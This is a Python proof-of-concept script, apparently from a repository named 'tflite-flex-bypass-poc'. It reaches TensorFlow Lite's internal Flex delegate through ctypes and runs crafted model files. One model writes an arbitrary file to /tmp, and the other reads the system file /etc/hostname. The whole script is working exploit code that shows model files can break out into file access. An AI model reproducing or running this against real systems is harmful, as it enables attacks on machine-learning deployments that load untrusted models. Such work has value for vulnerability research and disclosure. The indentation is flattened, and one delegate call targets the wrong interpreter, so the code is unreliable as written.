tflite-flex-bypass-poc / flex_test.py
Rammadaeus's picture
Upload flex_test.py with huggingface_hub
1599cc5 verified
import os, ctypes
# Import TF first
import tensorflow as tf
from tensorflow.lite.python.interpreter_wrapper import _pywrap_tensorflow_interpreter_wrapper as wrapper
tf_dir = os.path.dirname(tf.__file__)
common_path = os.path.join(tf_dir, "lite/python/libpywrap_tflite_common.so")
common_lib = ctypes.CDLL(common_path, mode=ctypes.RTLD_GLOBAL)
# Get AcquireFlexDelegate
acquire = common_lib._ZN6tflite19AcquireFlexDelegateEv
acquire.restype = ctypes.c_void_p
acquire.argtypes = []
flex_ptr = acquire()
print(f"FlexDelegate ptr: {hex(flex_ptr) if flex_ptr else 'NULL'}")
if not flex_ptr:
print("FlexDelegate is NULL")
# Check IsFlexOp
is_flex = common_lib._ZN6tflite8IsFlexOpEPKc
is_flex.restype = ctypes.c_bool
is_flex.argtypes = [ctypes.c_char_p]
print(f"IsFlexOp(FlexWriteFile): {is_flex(b'FlexWriteFile')}")
print(f"IsFlexOp(FlexReadFile): {is_flex(b'FlexReadFile')}")
else:
# Try flex_write model
print("\n=== Testing flex_write.tflite with FlexDelegate ===")
with open("models/flex_write.tflite", "rb") as f:
model_data = f.read()
w = wrapper.CreateWrapperFromBuffer(model_data, 1, [], True, True)
print("Created interpreter wrapper")
result = w.ModifyGraphWithDelegate(flex_ptr)
print(f"ModifyGraphWithDelegate: {result}")
try:
w.AllocateTensors()
print("AllocateTensors succeeded!")
w.Invoke()
print("Invoke succeeded!")
if os.path.exists("/tmp/tflite_pwned.txt"):
with open("/tmp/tflite_pwned.txt") as f:
print(f"*** FILE WRITTEN: {f.read()} ***")
else:
print("File not written")
except Exception as e:
print(f"Error: {type(e).__name__}: {str(e)[:500]}")
# Also test flex_read
print("\n=== Testing flex_read.tflite with FlexDelegate ===")
with open("models/flex_read.tflite", "rb") as f:
read_data = f.read()
w2 = wrapper.CreateWrapperFromBuffer(read_data, 1, [], True, True)
w.ModifyGraphWithDelegate(flex_ptr)
try:
w2.AllocateTensors()
print("AllocateTensors succeeded!")
import numpy as np
w2.SetTensor(0, np.array(b"/etc/hostname"))
w2.Invoke()
print("Invoke succeeded!")
output = w2.GetTensor(1)
print(f"*** FILE READ: {output} ***")
except Exception as e:
print(f"Error: {type(e).__name__}: {str(e)[:500]}")